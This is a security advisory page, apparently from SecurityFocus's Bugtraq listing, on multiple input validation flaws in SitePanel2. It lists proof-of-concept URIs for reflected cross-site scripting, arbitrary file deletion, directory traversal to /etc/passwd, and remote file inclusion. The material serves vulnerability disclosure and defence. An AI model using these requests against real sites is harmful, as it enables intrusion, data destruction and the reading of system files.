Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

SitePanel2 Multiple Input Validation Vulnerabilities

No exploit is required.

The following proof of concept URI's are available:
http://www.example.com/users/main.php?p=5&do=2&v=177%22%3E[XSS]
http://www.example.com/admin/5.php?do=chsev&postid=177&usernamess=test&inadmin=no%22%3E[XSS]
http://www.example.com/admin/5.php?do=chsev2&postid=177&usernamess=test&inadmin=no&newsev=4%22%3E[XSS]
http://www.example.com/admin/5.php?do=chsev&postid=177%22%3E[XSS]&usernamess=test&inadmin=no
http://www.example.com/users/main.php?p=5&do=0&show=closed%22%3E[XSS]
http://www.example.com/admin/0.php?do=ratekb&id=11%22%3E[XSS]
http://www.example.com/users/main.php?p=6&do=0&v=post&id=11&sec_name=Blah%22%3E[XSS]

Arbitrary file deletion proof of concept:
http://www.example.com/admin/5.php?do=rmattach&rm=yes&id=../index.php

Directory traversal proof of concept:
http://www.example.com/users/index.php?lang=en.inc/../../../../../../etc/passwd%00

File include proof of concept:
http://www.example.com/users/main.php?p=http://www.example.com







 

Privacy Statement
Copyright 2009, SecurityFocus